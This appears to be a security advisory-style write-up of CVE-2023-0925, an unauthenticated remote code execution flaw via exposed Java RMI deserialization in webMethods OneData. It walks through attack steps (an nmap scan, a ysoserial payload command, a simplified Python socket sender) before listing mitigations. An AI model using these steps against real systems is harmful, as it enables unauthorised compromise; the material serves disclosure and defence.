CVE-2023-0925 - Unauthenticated Remote Code Execution in webMethods OneData via Exposed Java RMI

In early 2023, a critical vulnerability—CVE-2023-0925—was discovered in webMethods OneData (version 10.11), a popular data management platform by Software AG. The vulnerability centers around an exposed Java RMI registry running on Azul Zulu Java 11..15 embedded within the product, which listens on TCP port 2099 by default. This exposure lets unauthenticated attackers on the network execute arbitrary code as SYSTEM (on Windows), potentially leading to a full remote compromise of the affected system.

Vulnerable Ports:

- Java RMI registry: 2099/tcp (default)

The Vulnerability

webMethods OneData ships with a Java RMI setup. The RMI registry on port 2099 allows remote listings and interactions with RMI interfaces, which themselves are exposed on high TCP ports. Critically, these ports and the associated methods do not enforce authentication and accept serialized Java objects as user-supplied input.

An attacker with the ability to connect to these ports can use specially-crafted serialized Java objects (payloads) to exploit unsafe Java deserialization. Once the malicious serialized object is passed as a parameter to one of the OneData RMI methods and then deserialized by the application, arbitrary attacker-chosen code is executed immediately, with full privileges of the webMethods OneData service.

This deserialization bug is a classic category of Java vulnerabilities and remains extremely dangerous when basic protections are not in place.

Step 1: Reconnaissance

First, the attacker scans the target for open ports, identifying 2099 (RMI registry) and the dynamically-assigned RMI interface port.

# Basic port scan example
nmap -p 2099,20000-65535 target.onedata.local

Step 2: Generate a Malicious Java Payload

Using a gadget chain from ysoserial (for instance, CommonsCollections1), the attacker creates a payload that, when deserialized, runs a chosen command on the server.

java -jar ysoserial.jar CommonsCollections1 'calc.exe' > payload.ser

*(This launches Calculator on Windows. Replace with relevant commands for actual implants.)*

Step 3: Send the Payload via RMI

There are several ways to trigger the RMI deserialization. The attacker can use a tool like marshalsec to directly interact with the exposed RMI service.

Example Python Code: Remote Invocation

*(Assuming knowledge of the target interface and method signature)*

import socket

# This is a simplified example. RMI protocol is binary and complex.
# In practice, tools like marshalsec or custom Java code would be used.

RMI_HOST = 'target.onedata.local'
RMI_PORT = 2099
PAYLOAD = open('payload.ser', 'rb').read()

s = socket.socket()
s.connect((RMI_HOST, RMI_PORT))
s.sendall(PAYLOAD)
s.close()

Note: Normally, you would use Java client tooling tailored for RMI. This is just to illustrate that the attack path is unfettered once you have network access.

Step 4: Get Code Execution

When the OneData RMI service receives and deserializes the object, the payload runs on the server with the service's privileges (typically SYSTEM on Windows).

Proof-of-Concept Tools

- ysoserial — Create Java gadget chains for RCE
- Nmap — Port scanning
- marshalsec — Exploiting Java deserialization and RMI

Remote, unauthenticated attackers can *fully compromise the server*

- Code is executed with all privileges of the running service (often SYSTEM/Administrator)

Upgrade: If possible, update webMethods OneData to the latest version immediately.

2. Restrict Access: Use firewalls to block external access to ports 2099 and the dynamic RMI interface ports.

Monitor: Audit your network for any unexpected inbound traffic to those ports.

4. Harden RMI: If RMI must be exposed, use authentication (SSL/RMI security managers) and limit classes available for deserialization.

References

- Original Advisory (Software AG security)
- NIST CVE Detail - CVE-2023-0925
- ysoserial (RCE payload generator)
- marshalsec (Java deserialization exploit tool)
- Java RMI Registry Exposed: The Serial Killer

Conclusion

*CVE-2023-0925* is a striking reminder that shipping software with exposed Java RMI and insecure deserialization is extremely hazardous. If you rely on webMethods OneData, patch immediately, restrict network access, and audit systems for signs of compromise. Attackers do not need credentials—just a remote connection and some basic Java tools. This issue can quickly underpin devastating attacks if left unaddressed.


*For questions, code samples, or removal requests, contact the author below.*

Timeline

Published on: 09/06/2023 18:15:00 UTC
Last modified on: 09/14/2023 15:40:00 UTC